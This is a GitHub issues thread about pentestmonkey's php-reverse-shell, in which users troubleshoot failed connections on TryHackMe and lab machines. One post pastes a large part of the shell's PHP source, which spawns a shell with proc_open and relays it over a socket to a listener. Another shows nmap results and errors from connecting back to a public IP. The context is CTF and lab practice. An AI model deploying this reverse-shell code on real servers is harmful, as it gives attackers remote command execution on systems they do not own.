pentestmonkey / php-reverse-shell Goto Github PK

shell listening problame do not work this shell

I get this when I run this on a TryHackMe server.

Hello everyone

I have a problem when a try to connect a reverse shell with the php reverse shell from

https://github.com/pentestmonkey/php-reverse-shell

I'm using a local kali linux installed in virtual machine in VMWARE in my laptop

the IP of my kali is the following 192.168.86.2

I'm trying to resolve the machine vulnversity of TRYHACKME this is the IP that I had from TRYHACKE this time

I start first the listener in my local kali linux in port 4444

this is my configuration in the php reverse shell code

but when a upload the shell to the server machine and try to execute the file this fails

please someone can help me, this error only occurs when I try a reverse shell in TRYHACKME machines, because when I try another machines downloaded from vulnhub or another resources in local this works fine

I dont know why just with this platform

thanks in advanced

I am running windows 7 and when I uploaded the reverse shell on the site it always gives the error of, daemonize wasn't completed. But running it on an attack box (I was doing the coldbox challenge on tryhackme). It works, any way to fix this or do I just use a Linux based system.

Hi you man,

I think you should change

function printit ($string) {
	if ($!daemon) {
		print "$string\n";
	}
}

with

function printit ($string) {
	if (isset($daemon)) {
		print "$string\n";
	}
}

I don't understand why but it's don't work. At page:

array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } // Set everything to non-blocking // Reason: Occsionally reads will block, even though stream_select tells us they won't stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } ?>

Hi. I'm trying this out on my own CentOS server. I used nmap to scan for open ports, I got this result:

Discovered open port 21/tcp on xxx.xx.xx.xxx
Discovered open port 143/tcp on xxx.xx.xx.xxx
Discovered open port 993/tcp on xxx.xx.xx.xxx
Discovered open port 110/tcp on xxx.xx.xx.xxx
Discovered open port 587/tcp on xxx.xx.xx.xxx
Discovered open port 995/tcp on xxx.xx.xx.xxx
Discovered open port 3306/tcp on xxx.xx.xx.xxx
Discovered open port 443/tcp on xxx.xx.xx.xxx
Discovered open port 25/tcp on xxx.xx.xx.xxx
Discovered open port 80/tcp on xxx.xx.xx.xxx
Discovered open port 465/tcp on xxx.xx.xx.xxx

Then I used netcat to listen to a port and modifed php file to communicate on that port and visited the url. Here's what I get for ports like 1234, 4444, etc.

WARNING: Failed to daemonise. This is quite common and not fatal.
Warning: fsockopen(): unable to connect to 198.46.87.211:4444 (Connection refused) in /home/xxxxxx/public_html/php-reverse-shell.php on line 100
Connection refused (111) 

And when I try an open port like 3306, I get this:

WARNING: Failed to daemonise. This is quite common and not fatal. Successfully opened reverse shell to 198.46.87.211:3306 ERROR: Shell connection terminated

But I'm not getting anything on netcat in either case. What am I doing wrong?